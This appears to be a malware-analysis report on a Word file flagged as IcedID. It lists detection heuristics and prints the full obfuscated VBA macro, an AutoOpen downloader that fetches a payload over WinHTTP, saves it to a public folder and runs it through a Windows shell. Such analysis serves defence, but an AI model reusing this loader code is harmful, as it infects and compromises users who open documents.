MALICIOUS
290
Risk Score
Heuristics 7
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
hdPjR(jLAxv + "." + "shell").exec (KoUmF) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set qKlgT = VBA.CreateObject(hEQqM + "" + zDpSi) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14517 bytes |
SHA-256: 2a682f8b90d1100ce230b74924a6b3d9b036818bcd3734ab91d15ebd6fd51ce1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aSshT"
Sub lmfxl(SiuYE, Optional ByVal usEfX As String = "c:\users\public\buZuK.txt", Optional ByVal zDpSi As String = "systemobject")
' Cursorily lusty
' Spheroid crates merchantable characteristic
' Turns collapse bankruptcies
' Knaves wryly burner ledger butter
' Inquisitorial
' Empathy carapace unclad tachographs
' Angelus relapse
' Inoculates plaintiffs epicurean substitution
' Dissemination cutlets winters dandies
' Commemoration
' Shakeup unarguable
' Tit uncharismatic vienna subventions
' Andes quadrature augurs invasions
' Stonemasons reinitialise octagon
' Annul paratroop therewith
' Struts deduction
' Posteriors ructions
' Sedition species headier heterodoxy evident frivols
' Fanbelt descriptive encroach george
' Labourintensive terminating laddie
' Naturalised allocation bandwagon
' Bye doctorates vainly
' Watery basket
' Aliened geometrical magnificently petticoat refutations headstrong
' Myopically
' Hopeless upstream peachiest escapees
' Constructivism stomping rescue alpine representation
' Craftsmanship pretoria evaluates
Set qKlgT = VBA.CreateObject(hEQqM + "" + zDpSi)
' Slackness hushes advocate
' Deepening endorser stoics unwounded
' Greenhouses mediation earthbound capricious subscribing grandsons
' Clustering titters cupid
' Gels
' Amortise ufo readjustment
' Bloodies
Set eWsph = qKlgT.CreateTextFile(usEfX)
' Bribes gist walkover trenching
' Uppers haziest wretched
' Haematology hosier foreseeability
' Satraps smallmindedness
' Parting sustaining consist agency punctuated
eWsph.WriteLine SiuYE
' Harassed filamentous outbuildings eddy
' Messes banshees
' Suboptimal celestial motorcycles marine
' Creditable recalls walls imperatively fibrillating
eWsph.Close
' Allow sulphonamides unpreparedness buttery
' Encroaches aft deniable
' Multimedia inanity
' Flutters wicked farmsteads purchaser warmer
' Cormorant slate sec eliminated
' Laterally bedsore virtues
' Propagandist maid grimaced schistosomiasis
' Monitored
' Ventriloquy harms homosexually directory
' Engraves lurk begone transgressing realigned
' Strategist detachable cylindrically molester
' Clogs darling lane
' Inborn antique larder
' Compatriots breathing misapprehension
' Fringed portend seizes unluckily
' Hexagons bicentennial reprobate outnumbered
' Juices goofing agreeably infrastructure
' Redisplay
' Bitchy academic
' Dogtag
' Discretely offset
' Rubberised battler
' Waterwheel arterial sharpest
' Punchable rekindled
' Circumcise evaporator jurassic disparity
' Reassembled wonderful arabesque
' Recklessness elaborately middle seaplane carbonated lesbians
' Marmosets holographic
' Stomping petunia
' Saleable spicier stationary oneness unloads lesson eraser
' Disembowel
' Radiantly eligible odiously lien translations
' Baloney adjacency firefight overeats undo
' Universal depose middleclass graves mega informally lameness
' Dramaturgical genuinely entwine brainy
' Bacteriologist
End Sub
' Scifi count cataracts anticipation frailer
' Encroaches
' Socalled
' Everincreasing strived
' Synthesising
' Noises careful strutter outdoors
Sub AutoOpen()
' Thieving atlantic underling characteristic stateliest rands slushy
' Friars sowing photovoltaic fowl
' Extinguishing sparingly
' Birthrate
' Chiropody humbles
' Schematic lilies downstage castigating
' Metropolises waterbeds labile
' Actively fences bitts
' Chateau
' Ferrying lunging industriously
' But comb impels entree
' Remainders clearsighted
' Scent assessors
' Deflection airiest
' Normalised anagrammatic trilogies formic
' Grandee boyfriend bivouacs
' Staunching childbearing
' Sidesteps
' Uvular benefice nail notification
' Jerseys diesel gird invalidity
' Ethyl
' Explanations republished
' Worsened postponing
' Conquests deadlocks
Dim TFGGE As New DOAtS
' Letterheads sonorously
' Rockier subsidy sealed splice tortuous
' Oust exponent honeydew canyons steepened
' Consultant nasal ventral excavate
' Martyrs rustles
zaQjn = ""
' Deaden patriarchal alarmist
' Diluting misquoting torpid
' Usually fathom
' Nett vary pretension
' Vibrant mathematical unquestioningly
' Inertia promulgating inveterate fillers misjudgment
' Resounding intrigued topped
' Snort imaginative discriminators jerkins wanly
' Directives unpardonable converted smoulders
' Adjoining barbiturates sweater handcuff piglets lavishing missives
' Dyers placer
SiuYE = TFGGE.EHwho(CgeBe)
' Woebegone brooding apparitions goodnaturedly
' Rarefactions calibrating discriminator
' Velour mire retorts organisationally
' Defiles climatological motorists objects retracted
' Sacrificing rustled
lmfxl gylfm(SiuYE)
' Charters expectoration piecemeal amok
' Cohered retitled uprightly
' Monomeric troubadours rehashed orifice stenographers
' Slewing genotypes monarchic
' Equivocating converter braindamaged dublin kisses
' Betrayal lowkey
' Sauna sandpiper
' Ophthalmic rasping
' Depleted
' Operation shear athlete
' Chauvinist blackhead cannonball vigorously
EUHhd GuEHk(0) + "vr32 c:\users\public\buZuK.txt", "wscript"
End Sub
Function cfasA(LWUzH, ZUFLy)
' Brazil blasphemy
' Exponentiation daytime gleam ovaries silted
' Wreaths amortise purple
' Honeymoon ellipse
' Cocoons
' Ignorant sclerosis recluses sequencing
' Minds shone stalked sidereal
cfasA = Split(LWUzH, ZUFLy)
End Function
Attribute VB_Name = "QkFVe"
' Attraction hated motorcycling apocalypse hillman
' Diversifies trunnions nappies
' Polluting certifiably
' Pelvises
' Cubing screamingly decimating
Function gylfm(nLsWZ)
' Unbiassed lawbreakers
' Concretely intoxication gravity blacked
' Onto memento
' Corresponds loyal diversifying inferentially
gylfm = StrConv(nLsWZ, vbUnicode)
' Scarce dramatise inspires
' Overlapping sympathised rationally bayonets receptions
' Cling unprocessed timid
' Slicings vulgarly
' Comments bumblers jackbooted dodgems
End Function
' Clamorously plagiarism
' Learn barred demonic
' Dustbin fawning unconsidered kickback polity
' Dress trowel dismemberment mopped
' Electability aint resourced jackass attenuates
' Frailer
' Songsters
Function VTHMP()
' Mackerel liner blabber crayoned rallied
' Contortion colonists ingeniously debentures
' Chemicals beatup ostentation scarp arbor
' Severally
' Blaster sublayer clogs repositioning
' Louse briskness incident
' Goatees quits crashes
' Jungle reactants catguts
' Flogs
' Mildest
' Dispatch persists appraised prisoner
' Iridium alarmed
' Influx gnaw antiparticles venison infinity
' Dangerousness notepad scarab not notations
With ActiveDocument.shapes(1)
VTHMP = .AlternativeText
End With
End Function
' Hierarchic swoop
' Commissariat tiresome responsibly even pie
' Wallow gorgons britain
' Herring transiently
' Humorously scripture incomprehension revivifying
Function GuEHk(DkuSo)
' Crocheted grainiest idiosyncrasies cloven
' Skirl libertarians
' Idealisation blackball accepting microphones portended tower
' Wildeyed
' Hiking analytical
' Disillusioning trump
' Revivalism noting luminal
' Combatant drought vane
' Iconoclasm eerily underwrite hutches
' Sequestrated excruciatingly
usAiX = cfasA(VTHMP(), "~~~")
TOhyH = usAiX(DkuSo)
GuEHk = TOhyH
End Function
Attribute VB_Name = "DOAtS"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function ubKrQ(Beqea)
' Skippering passage euphonium
' Startled offcuts metallurgy exasperate
' Essentialist slanderer craws
' Airtime decanted detachment bulky
' Condensation denture veranda
' Heath wiggled celebrate broadest
' Blasted battle obsolescent untempered softens
' Reach copiers weaving alleviate
' Amortise some outings fraud squiggle
' Microphones umlauts intoxicant
' Flakiest supervising
' Hobgoblins vision
' Curare procreative opacity devaluation
' Primordial
' Searchlight enslaved
' Wholesaler technophiles consensus propagandists
' Localise
AWOuI = Beqea
xzkPc = Len(AWOuI)
For YOUrc = 0 To xzkPc - 1
' Inquirer glowers mortgagees affably
' Psoriasis tartly
' Disperser
' Chirp comparatives sins idealising instantaneously
' Trot flaxen
' Dears leaching maddest
' Friendliest green uncut babbler untwist despatches
' Cuneiform excelsior intercede
' Imams next uncontested prat tapas
' Pedlar
' Extravaganzas dimples intermarriages spiking
' Strawberry regressions autonomously
' Lebanon unshielded joined impede
' Marring groovy gentleness formic collectivisation peacetime
' Fleecing reinterpret harmonic subtend
VDMJg = VDMJg & Mid(AWOuI, (xzkPc - YOUrc), 1)
Next YOUrc
' Rejoice sentient jackdaws
' Thinnish melody overlaying husbands
' Boneless paternalistic beggarly solar deletion contrived
' Quests reconfiguration inconvenienced
' Unequivocally repined loose morosely parvenu
' Fenland ego
' Kilobits emolument invariant appendage
ubKrQ = VDMJg
End Function
' Warms junks serotonin counterparts
' Shovels reconstructs
' Choke interrelated dermal
' Risotto ambushing etymologies classificatory biorhythm orthogonal
' Canoed tuesday gritted arbitrage bonded arbitrageur
Function EHwho(vZvkV)
' Epic snuffbox zips twister baroque translucent
' Boxy impotently doting
' Reactors auxiliary
' Wallets
' Followed stutters chasers workstations
' Interned foggiest shaved
' Arbitral crasher dispatches cigarette holdup
Dim vYyTT As Object
' Prosaist avoiding amputated
' Requisitions flagships
' Today numeral image pulse unrolling
' Bloodthirstiest yukon
' Informing
' Scam hardcore bustier stepsister
' Metro amphetamine assignment
' Geographic shallows contra influencing steeplechaser
' Purchase rain install
' Sunroof unscrew spasmodic
' Detailing inflame contuse griffins
Set vYyTT = CreateObject(ubKrQ(vZvkV) + "." + ubKrQ(vZvkV) + "Request.5.1")
' Restate choreographer skips distinguish pimp
' Mumbler resolutely
' Turrets rhinestone
' Admix equivocations inelegant yours draining pirated
' Wrinkles cistern
' Forecast
' Genealogies equations blackouts ventriloquy convulse smoked
' Coal configurations
' Inaccurate wellequipped
' Unselfishness treats unscrambling
' Swapped deferred
' Mufti judicature infestations jumpstarting quantity
' Corollaries chunnel reformer fruiting
' France blobs undercooked
' Physiognomy recurrent isogram thriftiest
' Sprayed installers cannibalising
' Architect
' Heathen bakes obtuseness nutation danube
' Pitons anthrax
' Vigour
' Inverted differentiation orgy escalator
' Catchers synchrotron
qQUlW = GuEHk(1)
' Onlooker footballer wasteland catacomb migrate
' Vitamins pampas hurt
' Monday refilling orthographic writings
' Irregularly imperturbable died wretch koalas blackboards
' Blaspheme memorandums
' Displace hyperbolic
vYyTT.Open "GET", ubKrQ(qQUlW), False
' Rand starlings condiment demonstrated
' Mistaken motile gentleman looter
' Godfather bridges
' Green bart heiresses consultations sibilant corrective
' Unwitting wettable queerly positions neutrino
vYyTT.Send
' Keenly dismounts
' Occupy fractious antral vasectomy
' Ovens defrauds inconstant
' Parasitology optimises
' Hotting huddles
' Dastardly lander statuettes seethe reinitialise dallying
' Bang
EHwho = vYyTT.responsebody
End Function
Attribute VB_Name = "aylsv"
Public Const CgeBe As String = "ptthniw"
Public Const hEQqM As String = "scripting.file"
Function hdPjR(mmNLs)
Set hdPjR = CreateObject(mmNLs)
End Function
Sub EUHhd(KoUmF, jLAxv)
' Dropouts formic
' Railroad bonus canons numskull
' Hungry
' Furnaces topically quaffing rigidity
' Mastodon boxers
' Refrains unifiable
' Extender revue collapse listlessness colitis
' Mispronunciation judges made
' Existentialistic tribesman
' Gleefully circumcision slurps wrench
' Advisory mobilities rescheduled unwelcome polytheism
' Polymeric hunting abodes
' Elongate sterilisations unilateralism monasticism egoism
' Looter tempers
' Strolls gondola
' Gastronomic substratum resubmit
' Collections segregation lushest cogitations
' Nurse transmogrifies geeks
' Ascribe coaxial outspread haemorrhoids minors
' Amputations vanes
' Paroxysm ontario worshipping notification emolument surreptitious culture
hdPjR(jLAxv + "." + "shell").exec (KoUmF)
' Beetroot depositories riveter facers indecisiveness
' Thunders social
' Pagan intimated evidential revisiting
' Devotee yak unceasingly
' Putty taxidermist
' Appliance contemplative snorting legislature viewed perseveres
' Debate cumlaude
' Amidships relinquishing
' Thorny billowed
' Bogging folks valet abbots chainsmoked
' Inspirational transcriber thoroughbreds wealthiest
' Dresser regain sagging ludicrously pathetic
' Timing faraday wronged minty
' Dissipates illinformed fraudster deluded
' Muff adjure
' Expropriated indispensability crease
' Aestheticsy lowers reverberated pathos
' Shut occupants scorned bladed
' Forbearance transactional testify crotchety satisfactions
' Frameworks retests funded prudently
' Spigot deftness wrangled brakes
' Encrypt idiosyncrasies
' Caries pervaded scrubs gases roved
' Languorously
' Summoning colourless
' Crossword
' Erudite openmindedness tunes predominating
' Disappears addressees demise omnipresence
' Biographically xenon lunched beginner prettier buyers lingers
' Demolitions iranian coastal noggin
' Neatly
' Quainter knob saleswoman broths microwaveable
' Resea
' Antidote varied leisure collided delectation
' Lathers outpointing
' Romanticism lobby contouring journalling
' Laptops defects musicals
' Unannounced lumbago funnies
' Guttering reseller
' Shipwright spinet
' Injoke
' Frailties grammarians truncheons defensively purposeless
' Disclaiming avalanching amniotic
' Black reindeer kilobytes known
' Tints carrot freshmen symbiotically
' Indoor actives innate
' Manically lurker camera snare hunkers adlibs
' Centralisation prickliest strengths
' Heliography differed fountains
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 50176 bytes |
SHA-256: 82b09531b3578b587e0c3d263d70f131c34900b2f8f75a839d39d9f2241a8f10 |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.